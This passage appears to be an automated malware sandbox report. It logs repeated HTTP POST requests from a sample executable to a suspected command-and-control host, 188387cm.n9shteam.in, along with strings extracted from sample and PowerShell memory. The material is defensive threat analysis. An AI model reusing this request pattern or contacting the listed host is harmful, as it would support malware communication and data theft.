                    Source: global trafficHTTP traffic detected: POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 188387cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 188387cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 188387cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 188387cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 188387cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 188387cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 188387cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 188387cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: 188387cm.n9shteam.in
                    Source: unknownHTTP traffic detected: POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 188387cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 17:55:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VCc4l8Mq4w8yasVGHIME8n3WQZ7Y%2BpBziQAakd4hvT8IZbrbE7zCVCgELsRBw3AAIL3xd3viH%2ByE0LTtPUaaz2ATjTKC5%2FGP4OWDbHdyNsBXkk3ojBR7vMEcb3yvNscdnbRSkMCajw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eff1b0dcd07c44f-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=3191&min_rtt=1579&rtt_var=3817&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=633&delivery_rate=100821&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 17:56:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tUvEIZRzSEEz4FbcwiFrqgWL7YPd7YZKCaPku%2FJJJCnhIWRVvC88pkScHX0QqHcwZ2%2FNP5eKgf7O%2B00SuaOGM93bk7ZrnVGM017pY9335jBgUanXY6EGH2wY2mMU0BBAUWcExi9kuQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eff1ca90ab678d6-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3531&min_rtt=1806&rtt_var=4128&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=686&delivery_rate=93535&cwnd=145&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 17:56:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2BDfsCJLI4TlbxCD4EPrlBkRXEANjCs7cA5SWCBCgTd%2F8SvhKrR4Cvs3X9HYFgPw8COGTjp0GfUQFYBLmnw7Ryha9AweJ1%2BJAjYrj9YvEk%2Bh56Mm8%2Fzyp22VADf6IXr8HVZPtmg5dQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eff1cdb6eaf42ef-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=15154&min_rtt=10362&rtt_var=13470&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=681&delivery_rate=29978&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 17:56:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XoriqbBOB%2BCnBJAgk1lEQ7zc2ueqGZthy0NIwZQh0Zv8mB0cHrZs%2FG7xwvZdK0CTWOsYpC%2B1WX%2FIOoNWFCDauGa4Om02vXkwCcpriwBN%2BPKJWeVHP2cfwKwBTBRkcXjuzOBECwh3zg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eff1d0ecd044356-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3115&min_rtt=1607&rtt_var=3620&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=680&delivery_rate=106740&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 17:56:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gGiJxCFXy2nr0giY%2BiuZ7mHxecmuJMOKctQc9gJobJeuBRy%2BSjzBzztVtrdHA8Nw5JiSvAjcES7x3M1K173x9d%2FGRCfDFGyEurdTSxx4%2FT1OPAInsGHaIlrTTwy2PmM5ZJoY%2FtjYSA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eff1d422992c44f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3199&min_rtt=1734&rtt_var=3580&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=681&delivery_rate=108501&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 17:57:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=auUHd77mNbIY1OFSqt2cPCeGF9%2BKIbFEsglIl2cnYKJ4pcvgaQtrCXw7UfVwo72QVPUkrsSEYBLD%2F%2FrwwEI6y4wALY0DPpOCZPmKpj3Qf6YPj7vQPXqtvglfPNYD23vZW883nk%2B0ow%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eff1da30b1178d6-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=3533&min_rtt=1781&rtt_var=4172&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=645&delivery_rate=92422&cwnd=145&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 17:57:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vKnm5Aktim%2BkOGzhYTEDjQd417a%2FSLQ715r3CKgzplPfpzJUbXOV9sKuOpc%2F0z0DP8RM2uBgZzpePKm%2BpAmezsjTAsWnSEkw5ewZ5dTFkWpdS63IHoIN0lzzCQBZmYoopq2k4GtBnA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eff1dd7ac5942ef-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4035&min_rtt=1586&rtt_var=5494&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=681&delivery_rate=68919&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 17:57:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AagREarZeZlWCORPNbVh%2FdF17qqYnei67zS%2FF4igQ5vA%2FqoDn7PPZlhwi6RgY3%2FIKSE1OCvVxltPQI5aEFDXFqhnV0uMbXwboVuHtFd1%2FMgSWtcKBtWkLLlOoXzS1yW0s1LeJHZ3nA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eff1e08fc194356-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3514&min_rtt=1702&rtt_var=4263&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=681&delivery_rate=90112&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 17:57:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=znrVN6YZReAP%2Fw3qnpZB1toKNEgQDb0oUF0soQre702DRXxtokfpRrq94DMxyXnseRSM4Ze7EY7FLUg%2BHwPHCyO1X%2BqK6b9hVq1aM2H8aq27OMDeRPbT%2FP8%2FP9M2eUB9pHU5BCRplA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eff1e3b4aef0f41-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=3022&min_rtt=1630&rtt_var=3395&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=645&delivery_rate=114366&cwnd=144&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                    Source: USZqVcJFLA.exe, 00000035.00000002.2008201045.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, USZqVcJFLA.exe, 00000035.00000002.2008201045.0000000002CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188387cm.n9shteam.in
                    Source: USZqVcJFLA.exe, 00000035.00000002.2008201045.0000000002B0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188387cm.n9shteam.in/
                    Source: USZqVcJFLA.exe, 00000035.00000002.2008201045.0000000002B0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
                    Source: powershell.exe, 00000024.00000002.3152354390.000001C610075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000025.00000002.1952100669.000001E30022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 0000001D.00000002.1978904137.000001421EE99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1950205628.000002C880229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1969431867.000001781F659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1946548161.0000013501638000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1941235753.000001C600229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1952100669.000001E30022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: JNKHlxGvw4.exe, 00000000.00000002.1832050899.0000000002A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1978904137.000001421EC71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1950205628.000002C880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1969431867.000001781F431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1946548161.0000013501411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1941235753.000001C600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1952100669.000001E300001000.00000004.00000800.00020000.00000000.sdmp, USZqVcJFLA.exe, 00000035.00000002.2008201045.0000000002B0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 0000001D.00000002.1978904137.000001421EE99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1950205628.000002C880229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1969431867.000001781F659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1946548161.0000013501638000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1941235753.000001C600229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1952100669.000001E30022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000025.00000002.1952100669.000001E30022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 0000001D.00000002.1978904137.000001421EC71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1950205628.000002C880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1969431867.000001781F431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1946548161.0000013501411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1941235753.000001C600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1952100669.000001E300001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000024.00000002.3152354390.000001C610075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000024.00000002.3152354390.000001C610075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000024.00000002.3152354390.000001C610075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000025.00000002.1952100669.000001E30022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000024.00000002.3152354390.000001C610075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC33CD08692B74926AEFF4FCBC6A080B2.TMPJump to behavior
